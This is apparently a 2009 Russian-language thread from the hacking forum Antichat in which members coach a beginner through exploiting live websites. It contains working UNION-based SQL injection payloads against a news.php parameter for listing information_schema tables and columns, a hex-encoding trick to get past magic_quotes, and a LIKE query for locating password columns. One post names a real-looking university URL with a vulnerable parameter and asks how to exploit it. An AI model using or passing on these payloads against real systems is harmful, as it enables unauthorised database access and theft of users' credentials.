ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.04.2009, 16:50
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 10
Провел на форуме:
48476
Репутация:
2
|
|
Помогите, пожалуйста, разобраться, только постигаю азы:
запрос: news.php?id=-349+union+select+1,2,3,4,5,6,7,8,9--
потом: news.php?id=-349+union+select+1,table_name,3,4,5,6,7,8,9+from+i nformation_schema.tables+limit+1,1--
получаю имена таблиц:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
и т.д.
далее пытаюсь определить столбцы, делаю:
news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+ information_shema.columns+where+ table_name='имя_таблицы'+limit+1,1--
и тут тишина.... страница открывается ак же как при запросе: news.php?id=349'
по version() выдает: 5.0.67-0ubuntu6
как быть дальше?
|
|
|
28.04.2009, 16:51
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
magic_quotes режет.
имя_таблицы в хексе делай.
типа так: table_name=0x7573657273
x3k.ru
Последний раз редактировалось ph1l1ster; 28.04.2009 в 16:53..
|
|
|
|
28.04.2009, 17:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
www.philology.kiev.ua/php/kafkaf.php?id=7&sid=2
Инклюд. Уязвим параметр id. Но вот расскрутить не могу. Help me, please! |
|
|
|
28.04.2009, 17:11
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 10
Провел на форуме:
48476
Репутация:
2
|
|
news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+ information_shema.columns+where+table_name='0x434f 4c4c4154494f4e53'+limit+1,1--
table_name=COLLATIONS
пробовал маленькими буквами т.к. хекс для них разный  |
|
|
|
28.04.2009, 17:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Conroe
news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+ information_shema.columns+where+table_name='0x434f 4c4c4154494f4e53'+limit+1,1--
table_name=COLLATIONS
пробовал маленькими буквами т.к. хекс для них разный кавычки тут не нужны, так как для mysql это уже 16ричное представление строки.
news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+ information_shema.columns+where+table_name=0x434f4 c4c4154494f4e53+limit+1,1--
как раз кавычки и обламывают тебе инъекцию, точнее ее обламывает magic_quotes_gpc= ON
эта опция экранирует спецсимволы такие как кавычка и нуллбайт итд.
при этом сервер получает запрос вида блаблабла where table_name=\'collations\'
а такой запрос не является синтакисчески верным.
Последний раз редактировалось geezer.code; 28.04.2009 в 17:24..
|
|
|
|
28.04.2009, 17:24
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 10
Провел на форуме:
48476
Репутация:
2
|
|
Сообщение от geezer.code
кавычки тут не нужны, так как для mysql это уже 16ричное представление строки.
news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+ information_shema.columns+where+table_name=0x434f4 c4c4154494f4e53+limit+1,1--
пробовал результат одинаковый
|
|
|
|
28.04.2009, 17:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Conroe
пробовал результат одинаковый
линк сюда, либо в пм.
зы +from+ information_s chema.columns+
|
|
|
|
28.04.2009, 17:33
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 10
Провел на форуме:
48476
Репутация:
2
|
|
Сообщение от geezer.code
линк сюда, либо в пм.
зы +from+ information_schema.columns+
   долбанная невнимательность
|
|
|
|
28.04.2009, 18:02
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
Может для начинающего это и лишния информация, но все таки...
Дабы упростить поск таблиц где есть поля "login"&"password" к (примеру..
Можно воспользоваться оператором like
Синтаксис такой:
news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+ information_shema.columns+where+column_name+like+' password'--+
Данный запрос выведет:
Имя таблици и названия базы, где есть поля password/* так же при необходимости слово password моно перевести в 16й код..
Так же моно листать через оператор limit
news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+ information_shema.columns+where+column_name+like+' password'+limit+1,1--+
Последний раз редактировалось farex; 28.04.2009 в 18:07..
|
|
|
|
28.04.2009, 18:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
И к чему это? Прочти <title>(.*)</title>
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
